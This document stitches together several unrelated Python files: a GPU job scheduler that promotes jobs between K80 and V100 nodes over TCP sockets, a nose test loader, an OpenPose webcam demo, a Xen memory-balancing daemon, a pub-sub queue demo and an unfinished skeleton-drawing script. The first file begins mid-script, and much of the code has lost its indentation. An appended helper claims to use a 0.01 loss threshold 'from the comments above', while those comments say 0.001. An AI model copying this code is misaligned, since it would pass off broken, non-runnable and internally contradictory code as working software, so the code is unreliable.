pc_job = [] # list of jobs that are practically completed
K80_node = 'c2180'
V100_node = 'd1020'
host_node = 'c0168'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 300s (5 min) runtime threshold before a job qualifies for promotion
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
# takes in a list of jobs qualified for promote, returns a list of jobs that get upgraded, and an empty list for demoted
# jobs
def random_promotion(K80_free, V100_free, promote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
# if more promote jobs than demote jobs, always demote all demote jobs
if len(promote_list) >= len(force_demote):
V100_avail = num_demote + V100_free
if V100_avail >= len(promote_list):
return promote_list, force_demote
else:
return random.sample(promote_list, V100_avail), force_demote
# if more demote jobs than promote jobs, always promote all promote jobs
else:
K80_avail = num_promote + K80_free
if K80_avail >= len(force_demote):
return promote_list, force_demote
else:
return promote_list, random.sample(force_demote, K80_avail)
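# Illustrative behaviour (numbers are assumed): with 3 promotion candidates, 1 forced
# demotion and 1 free V100 slot, V100_avail is 2, so 2 of the 3 candidates are
# promoted at random and the forced job is demoted.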
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
send_signal(node, 'save ' + job)
global ovhd_start
global pc_job
#if job not in pc_job:
ovhd_start[job] = time.time()
# after sending checkpoint signal, wait for it to finish
while True:
time.sleep(5)
with open('checkpoint.json', 'r') as fp2:
checkpoint_dict = json.load(fp2)
if checkpoint_dict['job'+job] == 1: # checkpoint has finished
print('checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp2:
fp2.write(json_file)
break
# also check if job has already finished
global finish_dict
if finish_dict['job'+job] == 1:
break
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# start job
def start_job(node, gpu, job):
# first wait for pid.json to show up, rename pid.json to pid_lock.json
# then in jobx.py, modify pid_lock.json, rename it to pid.json
# then wait for pid.json to show up
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# function that checks the tensorboard log of currently running jobs and logs practical complete jobs in a global list
# once a job reaches practical complete, it cannot be promoted. If it's already promoted, it gets demoted.
# criteria for practical complete: loss improvement has been smaller than the threshold (0.001) for the last 3 consecutive epochs
def check_practical_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
threshold = 0.001
global pc_job
global PJCT
global PJCT_epoch
for job in job_list:
# only check for job outside of practical complete job list
if job not in pc_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
loss_combine = []
for tc in dirs:
iterator = EventAccumulator(tc).Reload()
if len(iterator.Tags()['scalars']) > 0:
tag = 'loss' #iterator.Tags()['scalars'][2] # this is tag for loss
loss = [item.value for item in iterator.Scalars(tag)]
loss_combine += loss
# now that we have the loss at each epoch, we can check if it has reached practical complete
if len(loss_combine) >= 4:
latest_loss = loss_combine[-4:]
finished = True
for i in range(3):
                    # if the difference is >= threshold, the job has not reached practical complete yet
if latest_loss[i] - latest_loss[i+1] >= threshold:
finished = False
break
if finished:
print('job' + job + ' has reached practical complete, the last 4 loss values are')
print(str(latest_loss))
pc_job.append(job)
PJCT[job] = int(time.time() - job_start[job])
PJCT_epoch[job] = len(loss_combine)
############### first clear finish status of all jobs ####################
pid_dict = {}
with open('pid.json', 'r') as fp:
pid_dict = json.load(fp)
for key in pid_dict:
pid_dict[key] = 0
json_file = json.dumps(pid_dict)
with open('pid.json', 'w') as fp:
fp.write(json_file)
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
for key in checkpoint_dict:
checkpoint_dict[key] = 0
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file)
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
for key in epoch_waste_dict:
epoch_waste_dict[key] = 0
json_file = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file)
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
pass
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
finish_dict[job_name] = 1
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
################ check for practical finished jobs on K80 and V100 ######################
all_job = list(K80_job.values()) + list(V100_job.values())
check_practical_complete(all_job)
################ check run time of current K80 job, update qualified_job #################
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
if len(promote_list) > 0:
promoted, demoted = random_promotion(K80_free, V100_free, promote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
save_job(V100_node, job)
V100_job[gpu] = 'idle'
V100_used -= 1
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(V100_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
V100_job[gpu] = job_new
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_PJCT = np.average(list(PJCT.values()))
PJCT['average'] = average_PJCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
print('finished all runs')
JCT_name = testcase + '_JCT.json'
PJCT_name = testcase + '_PJCT.json'
PJCT_epoch_name = testcase + '_PJCT_epoch.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(PJCT_name, 'w') as fp2:
json.dump(PJCT, fp2, sort_keys=True, indent=4)
with open(PJCT_epoch_name, 'w') as fp2:
json.dump(PJCT_epoch, fp2, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
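# Hedged sketch (not part of the original script): the practical-completion test
# used in check_practical_complete(), restated as a standalone helper. The 0.01
# threshold and the four-sample window come from the comments above; the real
# script reads each job's loss history from its log files instead of taking it
# as an argument.
def practically_complete_sketch(loss_history, threshold=0.01):
    """Return True when each of the last three loss deltas is below threshold."""
    if len(loss_history) < 4:
        return False
    latest = loss_history[-4:]
    return all(latest[i] - latest[i + 1] < threshold for i in range(3))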
|
UnitTestCommon.py
|
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import os
import re
import traceback
import threading
import time
import nose
import nose.config
import nose.loader
import nose.plugins.manager
import nose.plugins.xunit
import logging
import ufora.native
import ufora.util.DirectoryScope as DirectoryScope
def sortedBy(elts, sortFun):
return [x[1] for x in sorted([(sortFun(y),y) for y in elts])]
def findTestFiles(rootDir, testRegex):
logging.info('finding files from root %s', rootDir)
testPattern = re.compile(testRegex)
testFiles = []
for directory, subdirectories, files in os.walk(rootDir):
testFiles += [os.path.join(directory, f) for f in files if testPattern.match(f) is not None]
return testFiles
def flattenToTestCases(suite):
if isinstance(suite, list) or isinstance(suite, unittest.TestSuite):
return sum([flattenToTestCases(x) for x in suite], [])
return [suite]
def fileNameToModuleName(fileName, rootDir, rootModule):
tr = (
fileName
.replace('.py', '')
.replace(rootDir, rootModule)
.replace(os.sep, '.')
)
if tr.startswith('.'):
return tr[1:]
return tr
def loadTestModules(testFiles, rootDir, rootModule):
modules = set()
for f in testFiles:
try:
with DirectoryScope.DirectoryScope(os.path.split(f)[0]):
moduleName = fileNameToModuleName(f, rootDir, rootModule)
logging.info('importing module %s', moduleName)
__import__(moduleName)
modules.add(sys.modules[moduleName])
except ImportError:
logging.error("Failed to load test module: %s", moduleName)
traceback.print_exc()
raise
return modules
def testCaseHasAttribute(testCase, attributeName):
"""Determine whether a unittest.TestCase has a given attribute."""
if hasattr(getattr(testCase, testCase._testMethodName), attributeName):
return True
if hasattr(testCase.__class__, attributeName):
return True
return False
def extractTestCases(suites):
testCases = flattenToTestCases(suites)
#make sure the tests are sorted in a sensible way.
sortedTestCases = sortedBy(testCases, lambda x: x.id())
return [x for x in sortedTestCases if not testCaseHasAttribute(x, 'disabled')]
def loadTestsFromModules(config, modules):
loader = nose.loader.TestLoader(config = config)
allSuites = []
for module in modules:
cases = loader.loadTestsFromModule(module)
allSuites.append(cases)
return allSuites
def loadTestCases(config, testFiles, rootDir, rootModule):
modules = sortedBy(loadTestModules(testFiles, rootDir, rootModule), lambda module: module.__name__)
allSuites = loadTestsFromModules(config, modules)
return extractTestCases(allSuites)
def startTimeoutThread(timeout):
'''
Start a thread which will eventually kill the process if the tests aren't finished
after the timeout
'''
assert timeout is not None
def killer():
time.sleep(timeout)
        sys.stderr.write('\n')
        sys.stderr.write(' *** Test failed to finish in %s seconds, aborting *** \n' % timeout)
ufora.native.Tests.forceStackdump()
t = threading.Thread(target=killer)
t.daemon = True
t.start()
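# Hedged usage sketch (not part of the original module): wiring the helpers
# above together. The root directory, module name and regex are assumptions
# about a hypothetical project layout.
#
#   config = nose.config.Config()
#   files = findTestFiles('/path/to/project/test', r'.*_test\.py$')
#   cases = loadTestCases(config, files, rootDir='/path/to/project/test', rootModule='test')
#   startTimeoutThread(3600)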
|
openpose.py
|
#!/usr/bin/env python
# requires the package https://github.com/ildoonet/tf-pose-estimation
# ./openpose.py --dev=dir:../images/madelman.png
# ./openpose.py --size=400x300
import cv2 as cv
import numpy as np
from threading import Thread
import time
from umucv.util import putText
from umucv.stream import autoStream
from tf_pose.estimator import TfPoseEstimator
from tf_pose.networks import get_graph_path, model_wh
e = TfPoseEstimator(get_graph_path('mobilenet_thin'))
def detect(image):
humans = e.inference(image, resize_to_default=False, upsample_size=4)
#print(humans)
if humans:
print(list(humans[0].body_parts.keys()))
# FIXME
try:
print(humans[0].body_parts[7].x, humans[0].body_parts[7].y)
except:
pass
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
return image
frame = None
goon = True
result = None
def work():
global result
while goon:
if frame is not None:
t0 = time.time()
result = detect(frame)
t1 = time.time()
putText(result, '{:.0f}ms'.format(1000*(t1-t0)))
t = Thread(target=work,args=())
t.start()
for key, frame in autoStream():
cv.imshow('cam',frame)
if result is not None:
cv.imshow('openpose', result)
result = None
goon = False
|
qmemmand.py
|
import configparser
import socketserver
import logging
import logging.handlers
import os
import socket
import sys
import threading
import xen.lowlevel.xs
import vanir.qmemman
import vanir.qmemman.algo
import vanir.tools
import vanir.utils
SOCK_PATH = '/var/run/vanir/qmemman.sock'
LOG_PATH = '/var/log/vanir/qmemman.log'
system_state = vanir.qmemman.SystemState()
global_lock = threading.Lock()
force_refresh_domain_list = False
def only_in_first_list(l1, l2):
ret = []
for i in l1:
if not i in l2:
ret.append(i)
return ret
def get_domain_meminfo_key(domain_id):
return '/local/domain/'+domain_id+'/memory/meminfo'
class WatchType(object):
def __init__(self, fn, param):
self.fn = fn
self.param = param
class XS_Watcher(object):
def __init__(self):
self.log = logging.getLogger('qmemman.daemon.xswatcher')
self.log.debug('XS_Watcher()')
self.handle = xen.lowlevel.xs.xs()
self.handle.watch('@introduceDomain', WatchType(
XS_Watcher.domain_list_changed, False))
self.handle.watch('@releaseDomain', WatchType(
XS_Watcher.domain_list_changed, False))
self.watch_token_dict = {}
def domain_list_changed(self, refresh_only=False):
"""
Check if any domain was created/destroyed. If it was, update
appropriate list. Then redistribute memory.
:param refresh_only If True, only refresh domain list, do not
redistribute memory. In this mode, caller must already hold
global_lock.
"""
self.log.debug('domain_list_changed(only_refresh={!r})'.format(
refresh_only))
got_lock = False
if not refresh_only:
self.log.debug('acquiring global_lock')
global_lock.acquire()
got_lock = True
self.log.debug('global_lock acquired')
try:
curr = self.handle.ls('', '/local/domain')
if curr is None:
return
# check if domain is really there, it may happen that some empty
# directories are left in xenstore
curr = list(filter(
lambda x:
self.handle.read('',
'/local/domain/{}/domid'.format(x)
) is not None,
curr
))
self.log.debug('curr={!r}'.format(curr))
for i in only_in_first_list(curr, self.watch_token_dict.keys()):
# new domain has been created
watch = WatchType(XS_Watcher.meminfo_changed, i)
self.watch_token_dict[i] = watch
self.handle.watch(get_domain_meminfo_key(i), watch)
system_state.add_domain(i)
for i in only_in_first_list(self.watch_token_dict.keys(), curr):
# domain destroyed
self.handle.unwatch(get_domain_meminfo_key(i), self.watch_token_dict[i])
self.watch_token_dict.pop(i)
system_state.del_domain(i)
finally:
if got_lock:
global_lock.release()
self.log.debug('global_lock released')
if not refresh_only:
system_state.do_balance()
def meminfo_changed(self, domain_id):
self.log.debug('meminfo_changed(domain_id={!r})'.format(domain_id))
untrusted_meminfo_key = self.handle.read(
'', get_domain_meminfo_key(domain_id))
        if untrusted_meminfo_key is None or untrusted_meminfo_key == b'':
return
self.log.debug('acquiring global_lock')
global_lock.acquire()
self.log.debug('global_lock acquired')
try:
if force_refresh_domain_list:
self.domain_list_changed(refresh_only=True)
system_state.refresh_meminfo(domain_id, untrusted_meminfo_key)
finally:
global_lock.release()
self.log.debug('global_lock released')
def watch_loop(self):
self.log.debug('watch_loop()')
while True:
result = self.handle.read_watch()
self.log.debug('watch_loop result={!r}'.format(result))
token = result[1]
token.fn(self, token.param)
class VMemmanReqHandler(socketserver.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
self.log = logging.getLogger('qmemman.daemon.reqhandler')
got_lock = False
try:
# self.request is the TCP socket connected to the client
while True:
self.data = self.request.recv(1024).strip()
self.log.debug('data={!r}'.format(self.data))
if len(self.data) == 0:
self.log.info('EOF')
if got_lock:
global force_refresh_domain_list
force_refresh_domain_list = True
return
# XXX something is wrong here: return without release?
if got_lock:
self.log.warning('Second request over qmemman.sock?')
return
self.log.debug('acquiring global_lock')
global_lock.acquire()
self.log.debug('global_lock acquired')
got_lock = True
if system_state.do_balloon(int(self.data.decode('ascii'))):
resp = b"OK\n"
else:
resp = b"FAIL\n"
self.log.debug('resp={!r}'.format(resp))
self.request.send(resp)
except BaseException as e:
self.log.exception(
"exception while handling request: {!r}".format(e))
finally:
if got_lock:
global_lock.release()
self.log.debug('global_lock released')
parser = vanir.tools.VanirArgumentParser(want_app=False)
parser.add_argument('--config', '-c', metavar='FILE',
action='store', default='/etc/vanir/qmemman.conf',
help='qmemman config file')
parser.add_argument('--foreground',
action='store_true', default=False,
help='do not close stdio')
def main():
args = parser.parse_args()
# setup logging
ha_syslog = logging.handlers.SysLogHandler('/dev/log')
ha_syslog.setFormatter(
logging.Formatter('%(name)s[%(process)d]: %(message)s'))
logging.root.addHandler(ha_syslog)
# leave log for backwards compatibility
ha_file = logging.FileHandler(LOG_PATH)
ha_file.setFormatter(
logging.Formatter('%(asctime)s %(name)s[%(process)d]: %(message)s'))
logging.root.addHandler(ha_file)
if args.foreground:
ha_stderr = logging.StreamHandler(sys.stderr)
        ha_stderr.setFormatter(
logging.Formatter('%(asctime)s %(name)s[%(process)d]: %(message)s'))
logging.root.addHandler(ha_stderr)
sys.stdin.close()
logging.root.setLevel(parser.get_loglevel_from_verbosity(args))
log = logging.getLogger('qmemman.daemon')
config = configparser.SafeConfigParser({
'vm-min-mem': str(vanir.qmemman.algo.MIN_PREFMEM),
'dom0-mem-boost': str(vanir.qmemman.algo.DOM0_MEM_BOOST),
'cache-margin-factor': str(vanir.qmemman.algo.CACHE_FACTOR)
})
config.read(args.config)
if config.has_section('global'):
vanir.qmemman.algo.MIN_PREFMEM = \
vanir.utils.parse_size(config.get('global', 'vm-min-mem'))
vanir.qmemman.algo.DOM0_MEM_BOOST = \
vanir.utils.parse_size(config.get('global', 'dom0-mem-boost'))
vanir.qmemman.algo.CACHE_FACTOR = \
config.getfloat('global', 'cache-margin-factor')
log.info('MIN_PREFMEM={algo.MIN_PREFMEM}'
' DOM0_MEM_BOOST={algo.DOM0_MEM_BOOST}'
' CACHE_FACTOR={algo.CACHE_FACTOR}'.format(
algo=vanir.qmemman.algo))
try:
os.unlink(SOCK_PATH)
except:
pass
log.debug('instantiating server')
os.umask(0)
server = socketserver.UnixStreamServer(SOCK_PATH, VMemmanReqHandler)
os.umask(0o077)
# notify systemd
    notify_socket = os.getenv('NOTIFY_SOCKET')
    if notify_socket:
        log.debug('notifying systemd')
        s = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        if notify_socket.startswith('@'):
            notify_socket = '\0%s' % notify_socket[1:]
        s.connect(notify_socket)
s.sendall(b"READY=1")
s.close()
threading.Thread(target=server.serve_forever).start()
XS_Watcher().watch_loop()
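# Hedged client sketch (not part of the original daemon): VMemmanReqHandler
# above reads an ASCII-encoded byte count, calls do_balloon() and answers
# b"OK\n" or b"FAIL\n"; closing the socket (EOF) releases the lock and forces a
# domain-list refresh. The helper below is an illustration only.
def request_balloon_sketch(bytes_needed, sock_path=SOCK_PATH):
    s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    s.connect(sock_path)
    s.sendall(str(int(bytes_needed)).encode('ascii'))
    reply = s.recv(1024)
    s.close()  # EOF tells the daemon the memory request is done
    return reply == b"OK\n"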
|
pubsub.py
|
import cmd
from queue import Queue
from threading import Thread
class Pub1(cmd.Cmd):
intro = 'pub-sub example'
prompt = '>>> '
file = None
def __init__(self, dispatch: Queue):
super().__init__()
self.dispatch = dispatch
def do_f1(self, arg):
self.dispatch.put(('f1', 'pub1 A'))
def do_f2(self, arg):
self.dispatch.put(('f2', 'pub1 B'))
print ("do_f2 called....")
def do_f3(self, arg):
self.dispatch.put(('f3', 'pub1 C'))
def do_allo(self, arg):
print ("\nAllo!\n")
def do_exit(self, arg):
return True
def command_queue_fn(q: Queue):
next = q.get()
while next is not None:
next[0](*(next[1:]))
next = q.get()
def dispatcher_fn(dispatch: Queue, command: Queue, subscribers: list):
next = dispatch.get()
while next is not None:
name = next[0]
args = next[1:]
for sub in subscribers:
try:
# command.put((getattr(sub, '%s' % name), *args)) Incompatible Python rev < 3.5
command.put(([getattr(sub, str(name))] + list(args)))
print (str(name))
except AttributeError:
pass
next = dispatch.get()
class Sub1:
def f1(self, msg):
print('Sub1, f1 :', msg)
def f2(self, msg):
print('Sub1, f2 :', msg)
class Sub2:
def f1(self, msg):
print('Sub2, f2 :', msg)
def f3(self, msg):
print('Sub2, f3 :', msg)
if __name__ == '__main__':
command_queue = Queue()
dispatch_queue = Queue()
pub1 = Pub1(dispatch_queue)
sub1 = Sub1()
sub2 = Sub2()
thread_command_queue = Thread(target=command_queue_fn, name='cmd_queue', args=(command_queue,))
thread_dispatcher = Thread(target=dispatcher_fn, name='dispath_queue', args=(dispatch_queue, command_queue, [sub1, sub2]))
thread_command_queue.start()
thread_dispatcher.start()
pub1.cmdloop()
dispatch_queue.put(None)
command_queue.put(None)
thread_command_queue.join()
thread_dispatcher.join()
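# Hedged note (not part of the original example): dispatch messages are
# (method_name, payload) tuples; dispatcher_fn forwards each one to every
# subscriber that defines a matching method, and command_queue_fn finally
# invokes it. Adding another subscriber is just another plain class, e.g.:
#
#   class Sub3:
#       def f2(self, msg):
#           print('Sub3, f2 :', msg)
#
# and passing [sub1, sub2, Sub3()] as dispatcher_fn's subscribers list.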
|
vis_stretch.py
|
# -*- coding: UTF-8 -*-
'''=================================================
@Author :zhenyu.yang
@Date :2020/11/5 11:37 AM
=================================================='''
import sys
sys.path.append('./')
sys.path.insert(0,'/data/zhenyu.yang/modules')
import cv2
import json
import numpy as np
import random
import copy
from multiprocessing import Process
import os
try:
from .skeleton_vis_tools import draw_points_and_skeleton,joints_dict
except:
from skeleton_vis_tools import draw_points_and_skeleton,joints_dict
def getFiles(path, suffix,prefix):
return [os.path.join(root, file) for root, dirs, files in os.walk(path)
for file in files if file.endswith(suffix) and file.startswith(prefix)]
def get_ear(ldmk):
eps = 1e-5
get_distance = lambda x,y:((x[0]-y[0])**2 + (x[1]-y[1])**2 + eps)**0.5
w = get_distance(ldmk[0],ldmk[4])
h = get_distance(ldmk[2],ldmk[6])
ear = h/w
ear = min(ear,0.7)
return ear
def get_ear_height(ldmk):
heights = [ldmk[2][1]-ldmk[6][1],ldmk[1][1]-ldmk[7][1],ldmk[3][1]-ldmk[5][1]]
return np.mean(np.abs(heights))
def get_fea_label(img_info):
skeleton = np.zeros((17,3))
if 'skeleton' in img_info and img_info['skeleton'] is not None and len(img_info['skeleton']) > 4:
for i ,pt in enumerate(img_info['skeleton']):
if i >= 11:
break
if pt[1] > 0:
skeleton[i] = [pt[0],pt[1],1]
return skeleton
def get_perclose(height_list):
max_height = max(height_list)
preclose_list = [1 - v/max_height for v in height_list]
preclose_50 = sum(v > 0.5 for v in preclose_list)
preclose_70 = sum(v > 0.7 for v in preclose_list)
preclose_90 = sum(v > 0.9 for v in preclose_list)
return [preclose_50,preclose_70,preclose_90]
def get_eye_movement(height_list):
height_change = [abs(height_list[i+1] - height_list[i]) for i in range(len(height_list)-1)]
return sum(v>1 for v in height_change) / len(height_list)
def list2num(slice_list):
num_list = []
for slice in slice_list:
num_list.extend(list(range(slice[0], slice[1] + 1)))
return num_list
def is_stretch(stretch_list,left_index,right_index):
# 1 : stretch 0: normal -1 : ignore
max_union = -1
frame_len = right_index - left_index
for stretch in stretch_list:
stretch_len = abs(stretch[1] - stretch[0])
temp_left = max(left_index,stretch[0])
temp_right = min(right_index,stretch[1])
if [temp_left,temp_right] in [stretch,[left_index,right_index]]:
return 1
union = (temp_right - temp_left) /( min(stretch_len,frame_len) + 0.1)
max_union = max(max_union,union)
if max_union < 0.2:
return 0
return -1
def get_batch_data(video_list,suffix,dst_dir,time_len = 10):
random.shuffle(video_list)
half_frame_len = time_len*25//2
while True:
if len(video_list) == 0:
break
video_path = video_list.pop()
json_path = video_path.replace('.mp4', suffix)
if not os.path.exists(json_path):
continue
with open(json_path, 'r') as f:
big_json = f.readlines()
skeleton_list = []
for json_info in big_json:
try:
json_info = json.loads(json_info.strip())
except:
continue
skeleton_list.append(get_fea_label(json_info))
stretch_path = video_path.replace(os.path.basename(video_path), 'stretch.json')
if not os.path.exists(stretch_path):
continue
with open(stretch_path, 'r') as f:
stretch_list = json.load(f)
stretch_index_list = []
normal_index_list = []
cap = cv2.VideoCapture(video_path)
for i in range(len(skeleton_list)):
ret,frame = cap.read()
if not ret:
break
if i % 5 != 0 :
continue
if i < half_frame_len or i >= len(skeleton_list) - (half_frame_len+1):
continue
temp_stretch = is_stretch(stretch_list,i-half_frame_len,i+half_frame_len)
if temp_stretch == 1:
stretch_index_list.append(i)
npy_name = '_'.join(video_path.split(os.sep)[-4:]).replace('.mp4','')
npy_name = '{}__{}__{}.jpg'.format(1,npy_name,i)
pt = skeleton_list[i]
pt[:, :2] = pt[:, 1::-1]
frame = draw_points_and_skeleton(frame, pt, joints_dict()[
'coco']['skeleton'], person_index=0,
points_color_palette='gist_rainbow',
skeleton_color_palette='jet',
points_palette_samples=10)
cv2.imwrite(os.path.join(dst_dir,npy_name),frame)
cap.release()
def split(input,num=60):
random.shuffle(input)
ans = []
sep = len(input) //num
for i in range(num-1):
ans.append(input[i*sep:(i+1)*sep])
ans.append(input[(num-1)*sep:])
return ans
if __name__ == '__main__':
version = 'v0.1'
suffix = '_{}.json'.format(version)
src_dir_dict = {'train':'/data/weiyu.li/DMSData/FatigueView/raw_video',
'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
src_dir_dict = {'test':'/data/weiyu.li/DMSData/FatigueView/test_video'
}
camera_list = ['ir_down','ir_front','ir_left','ir_left_up','ir_up','rgb_down','rgb_front','rgb_left','rgb_left_up','rgb_up']
camera_list = ['ir_left_up']
# camera_list = ['rgb_left_up']
data_type = 'train'
camera_id = 0
for data_type in src_dir_dict.keys():
